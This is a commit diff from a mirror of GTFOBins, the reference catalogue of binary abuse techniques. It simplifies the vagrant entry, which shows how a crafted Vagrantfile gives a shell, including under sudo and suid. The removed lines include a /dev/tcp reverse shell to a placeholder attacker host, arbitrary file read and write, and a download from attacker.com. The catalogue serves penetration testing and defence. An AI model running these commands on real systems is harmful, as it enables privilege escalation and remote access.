public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-10-22 16:48:09 +02:00
Code Issues Projects Releases Wiki Activity

Simplify vagrant

Browse Source
This commit is contained in:
Andrea Cardaci 2023-04-13 08:34:09 +02:00 committed by GitHub
parent e05b154647
commit f121dff1cc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
_gtfobins/vagrant.md
View File

@ -1,30 +1,20 @@
--- ---
description: | description: This allows to execute [`ruby`](/gtfobins/ruby/) code, other functions may apply.
Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed.
More Info at https://gtfobins.github.io/gtfobins/ruby/
functions: functions:
shell: shell:
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up - code: |
- cd $(mktemp -d)
echo 'exec "/bin/sh"' > Vagrantfile
vagrant up
sudo: sudo:
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up - code: |
reverse-shell: cd $(mktemp -d)
- description: | echo 'exec "/bin/sh"' > Vagrantfile
Run `nc -lvnp RPORT` on the attacker box. vagrant up
Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell. suid:
code: | - code: |
mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up cd $(mktemp -d)
file-write: echo 'exec "/bin/sh -p"' > Vagrantfile
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up vagrant up
file-read:
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up
library-load:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up
--- ---